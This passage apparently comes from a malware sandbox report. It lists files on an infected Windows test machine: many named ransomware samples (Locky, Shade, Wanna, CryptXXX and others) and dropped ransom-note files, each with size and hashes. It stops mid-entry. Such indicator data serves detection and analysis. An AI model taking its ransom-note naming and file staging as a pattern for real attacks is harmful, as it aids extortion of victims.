                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.NSIS.Zerber.fp-21211882310a506c89dd373e6aa8e6ac0802cefb7116879c0737fc1de7ed2726.exe

                                                                                                                    Filesize

                                                                                                                    240KB

                                                                                                                    MD5

                                                                                                                    ef84b1eab0a61dedcb7a449a2d457a74

                                                                                                                    SHA1

                                                                                                                    584c0782c67807612ae70a6ba77d550bb590d67c

                                                                                                                    SHA256

                                                                                                                    21211882310a506c89dd373e6aa8e6ac0802cefb7116879c0737fc1de7ed2726

                                                                                                                    SHA512

                                                                                                                    0128a9c337b7100175bcb6103a9dd7dba80721445d3d603099d24083a8f62287ddac5203254027e304fdd388dace552adcdc4c95a601d0820a5e23db3927d648

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Agent.iyo-4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79.exe

                                                                                                                    Filesize

                                                                                                                    20KB

                                                                                                                    MD5

                                                                                                                    4fef5e34143e646dbf9907c4374276f5

                                                                                                                    SHA1

                                                                                                                    47a9ad4125b6bd7c55e4e7da251e23f089407b8f

                                                                                                                    SHA256

                                                                                                                    4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

                                                                                                                    SHA512

                                                                                                                    4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.ixe-8c04de81a783137b2d326d6b7ab68b758c1ecccd9a6ca8e524b1de7f40566e5f.exe

                                                                                                                    Filesize

                                                                                                                    608KB

                                                                                                                    MD5

                                                                                                                    952422d06b3b8679bb6c2f6db73ab168

                                                                                                                    SHA1

                                                                                                                    85fd689486ee302bac24e747df59eb0ad23eccb9

                                                                                                                    SHA256

                                                                                                                    8c04de81a783137b2d326d6b7ab68b758c1ecccd9a6ca8e524b1de7f40566e5f

                                                                                                                    SHA512

                                                                                                                    61860cd37bcf5299ddd95c9cd1c6f0693263832d3d7a73add55c5db66623bb1d8385bb649fa1ff387059f462654a0533d8502c37a3661b849c7d4eb88d7cc013

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.lff-69db3826b8c5a29da243c6346d3cb29a2dd6773061bad375858ed8be9921c75f.exe

                                                                                                                    Filesize

                                                                                                                    369KB

                                                                                                                    MD5

                                                                                                                    d6e67ba2bc08d23512fc12133769aa43

                                                                                                                    SHA1

                                                                                                                    bf5caaacc484d3c951c0d918330068bba3640a0c

                                                                                                                    SHA256

                                                                                                                    69db3826b8c5a29da243c6346d3cb29a2dd6773061bad375858ed8be9921c75f

                                                                                                                    SHA512

                                                                                                                    1e7bdc11e182e9653a844bde9eb8d82c816ca0a8e974c5acf73d5a008f95a3b8da9740b5d4888466bb68fef65b107e936823842d0875119521a817706b0730d0

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.mso-a696330849345378e216dfd3588981c5113dc8478301f4de6a0aecc6c12f64ab.exe

                                                                                                                    Filesize

                                                                                                                    388KB

                                                                                                                    MD5

                                                                                                                    40612d96d1e7ca361a36f879301d548c

                                                                                                                    SHA1

                                                                                                                    1877b850c46c03a3230c4dc3b60bfa2e9ee46565

                                                                                                                    SHA256

                                                                                                                    a696330849345378e216dfd3588981c5113dc8478301f4de6a0aecc6c12f64ab

                                                                                                                    SHA512

                                                                                                                    f026e3ec1520f7b37a6a2a0a55690618278195c6e81145e0dab9539f3ab27367ad2b98e4ccc7cf11b92a793b59f2cbb6c234e779f93901d941202e3c18fba118

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Bitman.ovx-b21630178f1dd4177e63e9a1225f85531fcbedff032f792fddfeee5004339d6f.exe

                                                                                                                    Filesize

                                                                                                                    496KB

                                                                                                                    MD5

                                                                                                                    187310e9d43a5b07d19311a0328a46a3

                                                                                                                    SHA1

                                                                                                                    12fa92a9096581081857d7f9d5f44714409466ea

                                                                                                                    SHA256

                                                                                                                    b21630178f1dd4177e63e9a1225f85531fcbedff032f792fddfeee5004339d6f

                                                                                                                    SHA512

                                                                                                                    f7cc1d4992ed761716372c446503d15fccb5f20b6b2da917d43211acd7f52dc84b08a6b44781395e096cea24ecf4c5a055cc23af10eb10b0521af0e9e071a29f

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Blocker.kaud-2f194938918b5bd0737898b876add7101507eb346dfeffbd5d63c9279f285555.exe

                                                                                                                    Filesize

                                                                                                                    200KB

                                                                                                                    MD5

                                                                                                                    5fe6a3bd5194be17484ded6dad2a9bad

                                                                                                                    SHA1

                                                                                                                    4c71a0136d021f2f2faa0ec80655bac4c6357af9

                                                                                                                    SHA256

                                                                                                                    2f194938918b5bd0737898b876add7101507eb346dfeffbd5d63c9279f285555

                                                                                                                    SHA512

                                                                                                                    67039b618ac2553bb3299f305b91ad34cc7cc912286a309c201c4920123625cd13913678fe42c6f946b0ae369a4f8a69e889774ba78ab272affba69deab8600d

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Crusis.vd-9a5a08d7a4579e11f59594fe053c8157c20ab74a7775a11a1aa6154a3eb6744a.exe

                                                                                                                    Filesize

                                                                                                                    314KB

                                                                                                                    MD5

                                                                                                                    f93ecc98e4c4659023b81397578201e3

                                                                                                                    SHA1

                                                                                                                    8c6ce5195b39239d219da8de3b4e757204f75f07

                                                                                                                    SHA256

                                                                                                                    9a5a08d7a4579e11f59594fe053c8157c20ab74a7775a11a1aa6154a3eb6744a

                                                                                                                    SHA512

                                                                                                                    6835d190e85fa196e325d5b9e9833f88b22348b5e7dad7fe10aa2b065c66e61342cbf31fb8a4c1b5761a9f72b2f55d7eaeab9f8ee411ade6090327268a85a039

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.CryptXXX.asdgco-3c8ac670d8c920170dd431a5a08cbefd62a98e369eb552acbc04a0eeb2f2a198.exe

                                                                                                                    Filesize

                                                                                                                    6.1MB

                                                                                                                    MD5

                                                                                                                    a7fd9237c2c3f2047ba9a1614fefc049

                                                                                                                    SHA1

                                                                                                                    b560fe4756954b602a93b83b5d675153d1e9fd30

                                                                                                                    SHA256

                                                                                                                    3c8ac670d8c920170dd431a5a08cbefd62a98e369eb552acbc04a0eeb2f2a198

                                                                                                                    SHA512

                                                                                                                    90818b6cfcb238def0b05d95e42d93c26352c9dbbd5235f0c29e989da3d4e561b021e3ab14a832cf38793be11827b3030d82e3f15bf665ce07b4705250951377

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Foreign.flts-e15f77021c20cdb4f5d358941acaaaf80973fae74038b34980464a44b0b86653.exe

                                                                                                                    Filesize

                                                                                                                    86KB

                                                                                                                    MD5

                                                                                                                    220b2202a7016cb1f0ae6a66167a14b8

                                                                                                                    SHA1

                                                                                                                    27964201576755444b0285ce5f42bbdc5c3b31f1

                                                                                                                    SHA256

                                                                                                                    e15f77021c20cdb4f5d358941acaaaf80973fae74038b34980464a44b0b86653

                                                                                                                    SHA512

                                                                                                                    c8f04d1112bbacfd27749a1ea177440b9a693233c87bc05f50c0300c405e9fefd618c4579d7466e12f1b92a2b0384a6bf8e574e23535ba3fa1e1dc47623538d0

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Foreign.gthl-7524b52fa8d2c71d090506aa1f0d37636793749499fd7e3e567aa69dba0274e5.exe

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    MD5

                                                                                                                    7f4426e3a700c19838f4e79cad10ce22

                                                                                                                    SHA1

                                                                                                                    699d3e7b28f3091b13b41d9526da0a0cd9fc72a6

                                                                                                                    SHA256

                                                                                                                    7524b52fa8d2c71d090506aa1f0d37636793749499fd7e3e567aa69dba0274e5

                                                                                                                    SHA512

                                                                                                                    ee23ea984c5bd3f8672f294a9f8abdd1342b845c815a8d20bf61b888ea987044130b26f091b075ce8082899d3e150365939b9f087f3bd2fd804edac5aaf1172e

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Foreign.ltge-5696c2ba65833ee91b844858b0c9d43d2fd997d5131d2c4ce549e7aab842eaa3.exe

                                                                                                                    Filesize

                                                                                                                    287KB

                                                                                                                    MD5

                                                                                                                    1dfea60afb5e10fed0d911f8387234fe

                                                                                                                    SHA1

                                                                                                                    201cb6f4f0e19cf722cf70651e122a5a46e6d409

                                                                                                                    SHA256

                                                                                                                    5696c2ba65833ee91b844858b0c9d43d2fd997d5131d2c4ce549e7aab842eaa3

                                                                                                                    SHA512

                                                                                                                    0ac5448feda2641028699a1115e4a441407d9f8ab57eef630af5fd89acdd123d6fd8e45c7701ba296d7a2a95acfdfe66560cf735fb674dc3d44e620d8bab3ee2

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Foreign.nisu-e90de45553e1c7cc29fcd8368abefbd3133d469df34d4cf82ea119a5cf932557.exe

                                                                                                                    Filesize

                                                                                                                    385KB

                                                                                                                    MD5

                                                                                                                    878b1d7b44f77f4d725a29a0ba72bcc2

                                                                                                                    SHA1

                                                                                                                    92c5592cf5e7a20f8fe1da5d535bd6b63657223b

                                                                                                                    SHA256

                                                                                                                    e90de45553e1c7cc29fcd8368abefbd3133d469df34d4cf82ea119a5cf932557

                                                                                                                    SHA512

                                                                                                                    cfbb996901b6c976db333399c2daa491b684d79b98dc5627903bf8d2e577d39f9feee90c0e2fed6a058515fcde7a940f415897f3c1ba11c62a0deacb1e1be285

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Locky.bil-ada2164654315680132754a7063d2b94428d9101f302ff2a90dba6ab8ebd82b9.exe

                                                                                                                    Filesize

                                                                                                                    244KB

                                                                                                                    MD5

                                                                                                                    3ab88a42acfb6dc48c8b10641f60ba6f

                                                                                                                    SHA1

                                                                                                                    88f7cb0eeec56d416503fa6e957f7b5e3d2007d6

                                                                                                                    SHA256

                                                                                                                    ada2164654315680132754a7063d2b94428d9101f302ff2a90dba6ab8ebd82b9

                                                                                                                    SHA512

                                                                                                                    72677cd7a2da38b81aadb81f5e8825d212214ce9b31e69640dc99c7f6e87a32c098d8038968eea8cd83bcd74947971044293e8baf7151fbbefe0e457e66f27d6

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Locky.ex-891c9e5f09c94e1dd4ca1eed54c828a9c0f84c9ccfdede6856fa507d684a1293.exe

                                                                                                                    Filesize

                                                                                                                    206KB

                                                                                                                    MD5

                                                                                                                    9de151d6bb9c61206048d168476e7baa

                                                                                                                    SHA1

                                                                                                                    1f57ccefbcd86c0209b7e2dc8e9aba8eace78de3

                                                                                                                    SHA256

                                                                                                                    891c9e5f09c94e1dd4ca1eed54c828a9c0f84c9ccfdede6856fa507d684a1293

                                                                                                                    SHA512

                                                                                                                    d7965539a6ddcac3dd5fb57f2fcb13fd9c19da33150953dca10c526ba93f0da96382fbf2f4ab4acb6216d4716c07d1ee9289d0ed6fe9da4624e7445597093cd2

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Locky.xer-f38904e8444cea55342760c688a40f78478bfee89462a6a0675c01870388956b.exe

                                                                                                                    Filesize

                                                                                                                    392KB

                                                                                                                    MD5

                                                                                                                    e062161209de5934a7d5b95876ccfb9a

                                                                                                                    SHA1

                                                                                                                    8c5b9f4c66139fb8c35f2ef21b0e141daca3c26f

                                                                                                                    SHA256

                                                                                                                    f38904e8444cea55342760c688a40f78478bfee89462a6a0675c01870388956b

                                                                                                                    SHA512

                                                                                                                    59c6fdb5a83c05b1354e9cc5a946eaa5e57cf092e31779b285be5e536295e4cb35c1d65fcb46790b3a4f4f9e251a6e65b6eb6045d4ec493193e3ad0c3c207570

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Locky.xov-85f2b584251421b7ff98b80739bbacb1ace3fd48b2f1e039733de9c06fd733b6.exe

                                                                                                                    Filesize

                                                                                                                    397KB

                                                                                                                    MD5

                                                                                                                    a1cb3b6421e2c57341ff0d9532984fa7

                                                                                                                    SHA1

                                                                                                                    d72f5a681398da65e368a2eb3f484a0e461607e9

                                                                                                                    SHA256

                                                                                                                    85f2b584251421b7ff98b80739bbacb1ace3fd48b2f1e039733de9c06fd733b6

                                                                                                                    SHA512

                                                                                                                    f64ee498970b3837fabd61a9355447506468876ec338df54dca2ab49d9668d57e68dd4697afeaf401a445e00443d6983d4811c13c867425807196a579b810a69

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Purga.p-bdb4d7bc6e0d28bf50a77d01489b44c67ad858874b456add8bd8caf1db53f9c1.exe

                                                                                                                    Filesize

                                                                                                                    268KB

                                                                                                                    MD5

                                                                                                                    cb0899b1c30068c16b41791115ffff21

                                                                                                                    SHA1

                                                                                                                    fea94ceb18f67c3715b0cd60f2a994054cd859cc

                                                                                                                    SHA256

                                                                                                                    bdb4d7bc6e0d28bf50a77d01489b44c67ad858874b456add8bd8caf1db53f9c1

                                                                                                                    SHA512

                                                                                                                    45f7def6b06d98e7f2dfdd5a7dcd605d2a3035faf978d7803a6f10192693b7e74cff1166e4cd52a997a66246e3eb1a4d2a92fa7257f17c179c84665ba8e5c282

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Purgen.cz-5a721cdb14a1be01e656299875238666aec2d7c74d4012a6170b67d130e55168.exe

                                                                                                                    Filesize

                                                                                                                    238KB

                                                                                                                    MD5

                                                                                                                    c6e35f903caa92e8573dffb675e9e8f9

                                                                                                                    SHA1

                                                                                                                    6e9fd5930d0a7870c6d73bde017327cdfb3cb6ca

                                                                                                                    SHA256

                                                                                                                    5a721cdb14a1be01e656299875238666aec2d7c74d4012a6170b67d130e55168

                                                                                                                    SHA512

                                                                                                                    3d5d07c78d4b6aa6664929de79e7d24139266a8b2dbe1621f52dd5dbf9cb393655b5bad11e95016b379569c0c4f64351780e8280c0c3efd7e82e2fae33c717c5

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Purgen.dj-2815c8cdb02003298f7959fd1cf6eed893de6652f3861a6a2e3e5744b8ac9234.exe

                                                                                                                    Filesize

                                                                                                                    232KB

                                                                                                                    MD5

                                                                                                                    1bbd2dc9746292c60121865663b287f2

                                                                                                                    SHA1

                                                                                                                    04644335ef7523274146a4f39ab30621c2a2a9a1

                                                                                                                    SHA256

                                                                                                                    2815c8cdb02003298f7959fd1cf6eed893de6652f3861a6a2e3e5744b8ac9234

                                                                                                                    SHA512

                                                                                                                    da557f37abac2300ee03e4167d1dbf9d06d7f6faa6af887fb0966de4c3c7d35117f8ca0cee6e5d68d9ba091ab9464eb1a4b601a759c3b860b141afc346a0da66

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.SageCrypt.e-372df334d3c39186e880668677d75a5eaf714c94803ec4f7997a3e55789c3cf3.exe

                                                                                                                    Filesize

                                                                                                                    380KB

                                                                                                                    MD5

                                                                                                                    c7e481d591a25733396f9f70a366551a

                                                                                                                    SHA1

                                                                                                                    2002ca64b62c371c7bc51ba3b0ed9fae50a3bcf4

                                                                                                                    SHA256

                                                                                                                    372df334d3c39186e880668677d75a5eaf714c94803ec4f7997a3e55789c3cf3

                                                                                                                    SHA512

                                                                                                                    ce0cf24b41930f7f0e98cffec804cda6b85bb7ba3fe3c0d31e7894c352fe603f7e94ef655037aafb5d323a298bad537eab126032432b2966c65de90ab9c1ac98

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.nbv-69ba6ee95db4f02439a183c4d3f9dae71b9b0a4071c82076486573b446b38922.exe

                                                                                                                    Filesize

                                                                                                                    1.0MB

                                                                                                                    MD5

                                                                                                                    ab16895306479daff040e6be5d03a92c

                                                                                                                    SHA1

                                                                                                                    04cae7349ef45493199873113e3fc0e9afdac69d

                                                                                                                    SHA256

                                                                                                                    69ba6ee95db4f02439a183c4d3f9dae71b9b0a4071c82076486573b446b38922

                                                                                                                    SHA512

                                                                                                                    bcd5bb18b768c2126e24719b2fe131e6a85fe040fc67e3b696eb0bf272857b048b5bd10a8954ca11eb8f9e084695e32b8ddd39bfda1845a64230543339d0049a

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.ncm-0be9527b45f515ced879988770846c828e3be604ccaa14b6a9ce6e7f2fc72c0a.exe

                                                                                                                    Filesize

                                                                                                                    1.1MB

                                                                                                                    MD5

                                                                                                                    b041cbcc7008f5e6a7e0a6fd21bddc6b

                                                                                                                    SHA1

                                                                                                                    7c466aff7835818c0752bc3b88b9a32565ab2b4e

                                                                                                                    SHA256

                                                                                                                    0be9527b45f515ced879988770846c828e3be604ccaa14b6a9ce6e7f2fc72c0a

                                                                                                                    SHA512

                                                                                                                    2d8ece16726410e336fa06244d7a6f400d0db6d90b59cdd7a1f6f03ff9abb6ba3a1e3cd2e29aab3a2a04b2cc18a5a452a1f1796c79c71ea59534579aea25b397

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.ndg-a6471b8ea3b85c148a224157126c0ea3db8e803af5f93daa7deb4d63afc38d90.exe

                                                                                                                    Filesize

                                                                                                                    1.0MB

                                                                                                                    MD5

                                                                                                                    f6402c5dccd957c6231e4902df7c2865

                                                                                                                    SHA1

                                                                                                                    8dd6205623e695bb4ab7f02ca5d31249becde7d9

                                                                                                                    SHA256

                                                                                                                    a6471b8ea3b85c148a224157126c0ea3db8e803af5f93daa7deb4d63afc38d90

                                                                                                                    SHA512

                                                                                                                    9b90926308552c8cad4f5545a994910651eca44e8296869bcf1d9f746b010447f124be4d3b6e395241f6e5895cb2d1ab885e6246a59acd96dbcf3508a1b24b8b

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.ndl-bcdbaf591fdaea9cf391c369b626a2d73a458759686db76e9b3ce857458eefb4.exe

                                                                                                                    Filesize

                                                                                                                    1.1MB

                                                                                                                    MD5

                                                                                                                    cfa0877262deeafc5277e2e87b0c2036

                                                                                                                    SHA1

                                                                                                                    4d6a4f1058b03f6c022bbad5b9341d46aa641d39

                                                                                                                    SHA256

                                                                                                                    bcdbaf591fdaea9cf391c369b626a2d73a458759686db76e9b3ce857458eefb4

                                                                                                                    SHA512

                                                                                                                    9648bbb7101ffff53eb0aea8a9817567055a85b1d7d5e4b8c0888bb572d058192833c0821538c17ce962437aa35d69ca2afa67551834c838f8102d8e977b37a9

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.nep-ae1f435b9f0a0bbfc9cd2659520ba98b6a29d5961d142e4b36ba537583596b36.exe

                                                                                                                    Filesize

                                                                                                                    1.0MB

                                                                                                                    MD5

                                                                                                                    0222daed1432d4f7529f49b33125eaf9

                                                                                                                    SHA1

                                                                                                                    667ee62bef5e7f82f705f944f792b950198ebf97

                                                                                                                    SHA256

                                                                                                                    ae1f435b9f0a0bbfc9cd2659520ba98b6a29d5961d142e4b36ba537583596b36

                                                                                                                    SHA512

                                                                                                                    c1f5f3f7ede4de69a9b02c0974f3fd03dcab568e9c01ff967a9645255411cc565c91f938c2018569df51a426bf4312d47e88bba746c45e9239145c7f88b08301

                                                                                                                  • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Wanna.c-b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25.exe

                                                                                                                    Filesize

                                                                                                                    240KB

                                                                                                                    MD5

                                                                                                                    7bf2b57f2a205768755c07f238fb32cc

                                                                                                                    SHA1

                                                                                                                    45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                                                    SHA256

                                                                                                                    b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                                                    SHA512

                                                                                                                    91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                                                  • C:\Users\Admin\Documents\pkher.exe

                                                                                                                    Filesize

                                                                                                                    3KB

                                                                                                                    MD5

                                                                                                                    9dfc75037c8deccc2f1840b249b17750

                                                                                                                    SHA1

                                                                                                                    ee37e409cfe2b124e63f98f1797aec0330204b82

                                                                                                                    SHA256

                                                                                                                    b5680fd682b7f64e577492c097c825e4a5a00baa82a8668f478640c5f8918da1

                                                                                                                    SHA512

                                                                                                                    25e9f3546af040f3cf782b4d6c511517ac0c95cfff8b3afec407c5917427f3129c92495f95873fb67ad928a9c7ef234508ecc9ffd8835da260d8fd1e64ead16e

                                                                                                                  • C:\Users\Admin\Documents\save_your_files.html

                                                                                                                    Filesize

                                                                                                                    9KB

                                                                                                                    MD5

                                                                                                                    63059c2437df277d90a7ac6404e5d686

                                                                                                                    SHA1

                                                                                                                    9b97c5782849234b50eaa612eddcc42279f30895

                                                                                                                    SHA256

                                                                                                                    ed60dc3ec6d20ed08a692f975379eb2bf3631ed13e419d9e374b1f5cc3152ec8

                                                                                                                    SHA512

                                                                                                                    47e36c09686f586967f3b89efd1482820b9993893478c08324e7752ab00dec6e9889b97b7818ebe3daaea894566f173a72e798ece709c60d77e1ede1bd7d4a73

                                                                                                                  • C:\Users\Admin\Videos\!Recovery_BNC.html

                                                                                                                    Filesize

                                                                                                                    9KB

                                                                                                                    MD5

                                                                                                                    70286ad1d2fb99cc886ba25a291106d4

                                                                                                                    SHA1

                                                                                                                    5a3d8a08ef86248660f2f1fbd589236c6264cc23

                                                                                                                    SHA256

                                                                                                                    dbd08283a2a10812b0189076e0c0b534cbd7c58716e599233612bc99c1262a3f

                                                                                                                    SHA512

                                                                                                                    896d3fd58a7144fdc3ab11e45f0394a094722e418657df32ae2e69eccb7d30209fd03b7c6f874ac830241b596bee2dc9cad40f6d7268b9c648792e448a24f603

                                                                                                                  • C:\Users\Public\Documents\_READ_THI$_FILE_92XDOP_.jpeg

                                                                                                                    Filesize

                                                                                                                    150KB

                                                                                                                    MD5

                                                                                                                    953a4edbf54cd135ab869ff86f055be5

                                                                                                                    SHA1

                                                                                                                    8656d0eb4a2a6b562f33abb48ad6ec49fceb5896

                                                                                                                    SHA256

                                                                                                                    8e19c81c2a8fea004a0aea2cad0bbf45990c17592de55a695f5da1f364fff000

                                                                                                                    SHA512

                                                                                                                    59b75701a9938729aa4cf535586c96dd93f9564ca797ac00961f4275daafedfa6bef2e325823edd540ac4adc475808607894bfdd517a6a3cf024f957c8ddcdc6

                                                                                                                  • C:\Users\Public\Documents\_READ_THI$_FILE_95D5_.hta

                                                                                                                    Filesize

                                                                                                                    75KB

                                                                                                                    MD5

                                                                                                                    bd76837517b22107cda6e09d6092cddb

                                                                                                                    SHA1

                                                                                                                    816a1f4a27d557c907c9ab88d7318ff832f03244

                                                                                                                    SHA256

                                                                                                                    789a4f38fe0e257b0565b36aea784e3e531347243e0e2c61d7b2ad25feb9dfa0

                                                                                                                    SHA512

                                                                                                                    8b1c6ccf99588763b65cffbe14c4e242990fe7c567122e2f18add883282d981003c417600283bf09d0ae28488d10c6c49ac9b41febc934f3a68d307b052ef029

                                                                                                                  • C:\Users\Public\Documents\_READ_THI$_FILE_HPGM_.txt

                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    027279bf8835400b0a34df3e089b26f0

                                                                                                                    SHA1

                                                                                                                    512685863e0cd5f899306c5d550f6e1323c7ece1

                                                                                                                    SHA256

                                                                                                                    1fc7ea91c44367118b8a5684954ab8e36502f182bd945aab3801a4346f8a5495

                                                                                                                    SHA512

                                                                                                                    d3bb833413091268ca8e59319b4ab117a26b7b38bd2d35db3c33cc535cc326a09184ee5d52e2d631727f606d49a8570ee973b8f74723d30699c43ee8ad5c7236

                                                                                                                  • C:\Users\Public\Recorded TV\Sample Media\# DECRYPT MY FILES #.html

                                                                                                                    Filesize

                                                                                                                    12KB

                                                                                                                    MD5

                                                                                                                    96cf880ca0a42dc45313bbb8b277116c

                                                                                                                    SHA1

                                                                                                                    38b78bb134ef990f078066d197873e75109d8902

                                                                                                                    SHA256

                                                                                                                    dbffcf046097f08c85af29cb16ac10aa36301899782b6b5c44153630fb45f0db

                                                                                                                    SHA512

                                                                                                                    49aa8affbc80103eac6ac09dd5ba762900510bee063b2d4dd2ce24d1198788261248cc70ae1b101a77f89ca153ed69506545ab9781bcf2a22c604b2efc6aabcc

                                                                                                                  • C:\Users\Public\Recorded TV\Sample Media\# DECRYPT MY FILES #.txt

                                                                                                                    Filesize

                                                                                                                    10KB

                                                                                                                    MD5

                                                                                                                    a2c1c7f001175774771e5f380fce676b

                                                                                                                    SHA1

                                                                                                                    02d693247805f4db900dad6a6a9cdbc466d8a42d

                                                                                                                    SHA256

                                                                                                                    7a816f1fad04c39a0b772dda93c02ad023248e7a83c3949f8872ef6e973b5cd6

                                                                                                                    SHA512

                                                                                                                    7f8639141afe81dd31f2031ea869619c4b0465afa4d66cecf5486accc78e0be2997efbdc2bfe9d1191174bee32dc23226f15898951e1afe8b51f1481cb09719b

                                                                                                                  • C:\Users\Public\Recorded TV\Sample Media\# DECRYPT MY FILES #.url

                                                                                                                    Filesize

                                                                                                                    85B

                                                                                                                    MD5

                                                                                                                    a7898ec9fb78556dab44fa6a3d968e7f

                                                                                                                    SHA1

                                                                                                                    1733cb7f2408ed08e8862923e01bbe2232bec5a0

                                                                                                                    SHA256

                                                                                                                    185ce2441e548690cf5438b586eb7681f5292a5b4b4af3de0c34b152242c7f2e

                                                                                                                    SHA512

                                                                                                                    1a83a7a56a6e405aca2dae5f84065d57e9302a97148fc428483e850bc1ef7e18bcc024ab8e35555572211c75a309d3210e0eb2e77c415133ae35092fe1cffa95

                                                                                                                  • C:\Users\Public\Recorded TV\Sample Media\# DECRYPT MY FILES #.vbs

                                                                                                                    Filesize

                                                                                                                    216B

                                                                                                                    MD5

                                                                                                                    48ac29422570636cae371b68c858b988

                                                                                                                    SHA1

                                                                                                                    ff86dea198c93a8ae49ee52c6eb919fcbd259aab

                                                                                                                    SHA256

                                                                                                                    3926b08f205999c2f1a24121117ecfeed31557bf6f0529416f3432321292c6b0

                                                                                                                    SHA512

                                                                                                                    75019e6fd4b53528aab1af668149540e1bc372e58e4786eda1da75e7c9718dbc274cbf3f37cd38fbe7e618ea9c1b24c2534d18aecfcc3264ec55f83f206faaa3

                                                                                                                  • C:\Users\Public\Videos\how_to_back_files.html

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    MD5

                                                                                                                    18c96dab7ce8eaa67ea4830c940bb20e

                                                                                                                    SHA1

                                                                                                                    485c81fc6b2c1f16de0f64f1ecb6a59e0257dcd0

                                                                                                                    SHA256

                                                                                                                    2b6f0f7c8077d8a5005ee4e69c9d143bc07b4a070079224a0f5a37d992331c32

                                                                                                                    SHA512

                                                                                                                    65b2b1a1ec219253a38dac3e07ac6755dbe20d92608ce0b7958c29f94157f7aeb7e506cb95b4cc541a655075c5f4a11c365fb5b3792e53bcbaaf9419c9655aeb

                                                                                                                  • C:\Windows\Installer\$PatchCache$\Managed\00004109A10090400000000000F01FEC\14.0.4763\PROTTPLN.PPT_1033

                                                                                                                    Filesize

                                                                                                                    12KB

                                                                                                                    MD5

                                                                                                                    869f9133110546c95f112b850a33f98a

                                                                                                                    SHA1

                                                                                                                    3c8000224b3dee17f86b893ab7b60ef21fbbc14d

                                                                                                                    SHA256

                                                                                                                    8e3385e40b72d42de5564395b005c12680d0722d82c1b35c9213e6bf7368af1a

                                                                                                                    SHA512

                                                                                                                    9b508a82735f618b09dd0ae56f986c763ac5b82ada56fc0a9cd88e9c511989667f2253f8972eadbe2888275802af19dd5dc3dbac5a4b81630e61802891422637

                                                                                                                  • C:\Windows\Installer\MSI1D8D.tmp

                                                                                                                    Filesize

                                                                                                                    107KB

                                                                                                                    MD5

                                                                                                                    9f0b9bc54bb73dfb7cf85520da1a08cb

                                                                                                                    SHA1

                                                                                                                    236f7b770317d782f0817fbf7542140cb1e1526e

                                                                                                                    SHA256

                                                                                                                    0d44d40e8bda72a3d6ca26665100b256848e2183029a6728c18ad97cd650547f

                                                                                                                    SHA512

                                                                                                                    8acfb05a7b4723776fa66c0f71bde90dd49243de5dd2a8cf1a1f09a1175f9346c12a717050bff5f3938bda6cc4c610ca1eab75d4b9b7c8bcfb97d9158727a10d

                                                                                                                  • C:\Windows\Installer\MSI256F.tmp

                                                                                                                    Filesize

                                                                                                                    134KB

                                                                                                                    MD5

                                                                                                                    b8255a1bc3c307557741d2c99b8256d1

                                                                                                                    SHA1

                                                                                                                    48cc6f3c1a566f06684c5184cf830cbd7db638c2

                                                                                                                    SHA256

                                                                                                                    796aea9a46fb7704222a7fe1f4e27455b14640c816d6f961344f89dc47537b33

                                                                                                                    SHA512

                                                                                                                    85f685ad84f2208ad87ff34fb5e99edae50fc938a9335cb9747b7707d237c1b397c318090112eee0e9f04777ee004e26e7377f57c3e31159a96638b65110a69c

                                                                                                                  • C:\Windows\Installer\MSI4C93.tmp

                                                                                                                    Filesize

                                                                                                                    148KB

                                                                                                                    MD5

                                                                                                                    33908aa43ac0aaabc06a58d51b1c2cca

                                                                                                                    SHA1

                                                                                                                    0a0d1ce3435abe2eed635481bac69e1999031291

                                                                                                                    SHA256

                                                                                                                    4447faacefaba8f040822101e2a4103031660de9139e70ecff9aa3a89455a783

                                                                                                                    SHA512

